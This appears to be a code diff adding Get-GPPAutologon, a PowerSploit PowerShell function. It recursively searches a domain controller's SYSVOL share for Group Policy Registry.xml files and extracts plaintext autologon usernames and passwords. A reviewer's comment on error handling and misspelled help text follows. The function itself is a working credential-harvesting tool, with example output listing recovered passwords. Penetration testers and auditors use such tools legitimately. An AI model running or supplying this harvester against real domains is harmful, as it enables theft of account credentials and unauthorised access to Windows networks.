1+ function Get-GPPAutologon
2+ {
3+ <#
4+ . SYNOPSIS
5+
6+ Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
7+
8+ PowerSploit Function: Get-GPPAutologon
9+ Author: Oddvar Moe (@oddvarmoe)
10+ Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
11+ License: BSD 3-Clause
12+ Required Dependencies: None
13+ Optional Dependencies: None
14+
15+ . DESCRIPTION
16+
17+ Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
18+
19+ . EXAMPLE
20+
21+ PS C:\> Get-GPPAutolgon
22+
23+ UserNames File Passwords
24+ --------- ---- ---------
25+ {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
26+ {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
27+
28+
29+ . EXAMPLE
30+
31+ PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
32+
33+ password
34+ password12
35+ password123
36+ password1234
37+ password1234$
38+ read123
39+ Recycling*3ftw!
40+
41+ . LINK
42+
43+ https://support.microsoft.com/nb-no/kb/324737
44+ #>
45+
46+ [CmdletBinding ()]
47+ Param ()
48+
49+ # Some XML issues between versions
50+ Set-StrictMode - Version 2
51+
52+ # define helper function to parse fields from xml files
53+ function Get-GPPInnerFields
54+ {
55+ [CmdletBinding ()]
56+ Param (
57+ $File
58+ )
59+
60+ try
61+ {
62+ $Filename = Split-Path $File - Leaf
63+ [xml ] $Xml = Get-Content ($File )
64+
65+ # declare empty arrays
66+ $Password = @ ()
67+ $UserName = @ ()
68+
69+ # check for password and username field
70+ if (($Xml.innerxml -like " *DefaultPassword*" ) -and ($Xml.innerxml -like " *DefaultUserName*" ))
71+ {
72+ $props = $xml.GetElementsByTagName (" Properties" )
73+ foreach ($prop in $props )
74+ {
75+ switch ($prop.name )
76+ {
77+ ' DefaultPassword'
78+ {
79+ $Password += , $prop | Select-Object - ExpandProperty Value
80+ }
81+
82+ ' DefaultUsername'
83+ {
84+ $Username += , $prop | Select-Object - ExpandProperty Value
85+ }
86+ }
87+
88+ Write-Verbose " Potential password in $File "
89+ }
90+
91+ # put [BLANK] in variables
92+ if (! ($Password ))
93+ {
94+ $Password = ' [BLANK]'
95+ }
96+
97+ if (! ($UserName ))
98+ {
99+ $UserName = ' [BLANK]'
100+ }
101+
102+ # Create custom object to output results
103+ $ObjectProperties = @ {' Passwords' = $Password ;
104+ ' UserNames' = $UserName ;
105+ ' File' = $File }
106+
107+ $ResultsObject = New-Object - TypeName PSObject - Property $ObjectProperties
108+ Write-Verbose " The password is between {} and may be more than one value."
109+ if ($ResultsObject )
110+ {
111+ Return $ResultsObject
112+ }
113+ }
114+ }
115+ catch {Write-Error $Error [0 ]}
116+ }
117+
118+ try {
119+ # ensure that machine is domain joined and script is running as a domain account
120+ if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env: USERDNSDOMAIN ) ) {
121+ throw ' Machine is not a domain member or User is not a member of the domain.'
122+ }
123+
124+ # discover potential registry.xml containing autologon passwords
125+ Write-Verbose ' Searching the DC. This could take a while.'
126+ $XMlFiles = Get-ChildItem - Path " \\$Env: USERDNSDOMAIN \SYSVOL" - Recurse - ErrorAction SilentlyContinue - Include ' Registry.xml'
127+
128+ if ( -not $XMlFiles ) {throw ' No preference files found.' }
129+
130+ Write-Verbose " Found $ ( $XMLFiles | Measure-Object | Select-Object - ExpandProperty Count) files that could contain passwords."
131+
132+ foreach ($File in $XMLFiles ) {
133+ $Result = (Get-GppInnerFields $File.Fullname )
134+ Write-Output $Result
135+ }
136+ }
137+
138+ catch {Write-Error $Error [0 ]}
139+ }
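Review bot: The SYSVOL search on the `Get-ChildItem` line runs with `-ErrorAction SilentlyContinue`, so any policy folder the caller cannot read is skipped without a trace, and an incomplete scan can end in 'No preference files found.' or a short result list that reads like a clean audit. Keep the errors and report them: add `-ErrorVariable SearchErrors` to that call and follow it with `if ($SearchErrors) { Write-Warning "$($SearchErrors.Count) SYSVOL paths could not be read; results may be incomplete." }`. Separately, the comment-based help misspells the function as `Get-GPPAutologn` in the description and `Get-GPPAutolgon` in the first example, so that example cannot be run as written. `$Filename` in Get-GPPInnerFields is also assigned but never used.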